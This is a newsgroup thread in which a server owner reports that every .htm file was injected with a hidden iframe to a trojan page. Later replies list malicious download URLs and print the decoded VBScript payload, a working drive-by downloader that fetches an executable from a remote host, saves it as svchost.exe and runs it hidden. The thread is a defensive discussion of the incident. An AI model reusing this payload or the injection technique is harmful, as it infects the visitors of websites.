Server infected by a trojan

[s]

Hi folks,
Hoping someone here might be able to give some advice on an infection.
Today at around 9:42am my local time one of my web servers got infected
somehow. What ever infected it then scanned through all .htm files on
the server and added the following line near the bottom of each one.

I've removed the domain name:-
<iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
height=0></iframe>


So, any time someone tried to view a site on my server they were also
directed to a Trojan download.

I have since removed these lines from all the .htm files but I have no
idea how someone managed to run a program on my server that inserted all
these lines.

Obviously I'm no expert on security etc but I have tried to make sure my
firewall is up to a reasonable standard and also have Norton AV
Corporate running on the server.

Any advice/help is much appreciated.

 

[Gabriele Neukam]

Today at around 9:42am my local time one of my web servers got infected
somehow. What ever infected it then scanned through all .htm files on the
server and added the following line near the bottom of each one.

I've removed the domain name:-
<iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
height=0></iframe>

Maybe it is related to this incident

http://www.heise-security.co.uk/news/95591


Gabriele Neukam

(e-mail address removed)

--

Is there such a thing as a Honeymoon period in a new newsgroup?

(Roger Hunt in uk.comp.vintage)
In a want it now instantly straight away world - no
(Krustov in ucv)

 

[s]

Maybe it is related to this incident

http://www.heise-security.co.uk/news/95591


Gabriele Neukam

(e-mail address removed)

It could well be related, I really don't know.
What I don't understand is how hackers get the server to run something
that then scan's all the .htm files and injects the iframe line.

 

[jen]

It could well be related, I really don't know.
What I don't understand is how hackers get the server to run something
that then scan's all the .htm files and injects the iframe line.

Maybe reading this will enlighten you some(Google is your friend):

Virus Attack on web server
Iframe code getting added to each page request:
http://www.webmasterworld.com/microsoft_asp_net/3279736.htm

large-scale web attacks targeting sites and their users:
http://arstechnica.com/news.ars/pos...over-massive-attack-on-italian-web-sites.html

-jen

 

[Virus Guy]

(...) hker.htm

While searching the web for instances of kher.htm, I came across
these:

(warning - do not follow these links unless you know what you're
doing)

www.goldwindos2000.com/hkeraone/test.htm
us6.redhat520.com/haoba.htm

They are really executable files (not htm).

As of around 2 pm (EST), test.htm is identified mostly as a
downloader.trojan (4608.KF / 4608.102). Detection rate is 47% (not
detected by Kaspersky, Symantec among others).

haoba.htm is identified as Explorer.Hijack.AJYS / .4080. Detection
rate is 37%. Not detected by Avast, F-prot, Kaspersky, McAfee,
Microsoft, Symantec, among others.

---------------------------------

hker.htm is being coded with random spaces to give different MD5
hashes.

I submitted a sample to VT, and only 2 AV's id'd it as a threat:

Authentium: VBS/Psyme.BT@dl
NOD32v2: JS/Exploit.ADODB.Stream.Y

See this:

http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=VBS_PSYME.FP

When you take out the spaces, here's what it is (can someone decode
this script and print the URL?)

(I removed a few < and > because my nntp server doesn't like HTML code
I guess)

html
scriptlanguage="VBScript"
onerrorresumenext
dl="http://www.goldwindos2000.com/hkeraone/test.htm"
Setdf=document.createElement("object")
df.setAttribute"classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
b4="Mi"
b5="cr"
b6="o"
b7="soft"
b8=".X"
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Setx=df.CreateObject(strb,"")
a4="A"
a5="d"
a6="o"
a7="d"
a8="b"
a9="."
a10="S"
a11="t"
a12="r"
a13="e"
a14="a"
a15="m"
stra=a4&a5&a6&a7&a8&a9&a10&a11&a12&a13&a14&a15
setS=df.createobject(stra,"")
S.type=1
c4="G"
c5="E"
c6="T"
strc=c4&c5&c6
x.Openstrc,dl,False
x.Send
fname1="svchost.exe"
setF=df.createobject("Scripting.FileSystemObject","")
settmp=F.GetSpecialFolder(2)
S.open
fname1=F.BuildPath(tmp,fname1)
S.writex.responseBody
S.savetofilefname1,2
S.close
setQ=df.createobject("Shell.Application","")
Q.ShellExecutefname1,"","","open",0
/script
head
title Hello!!! /title
/head body
/body /html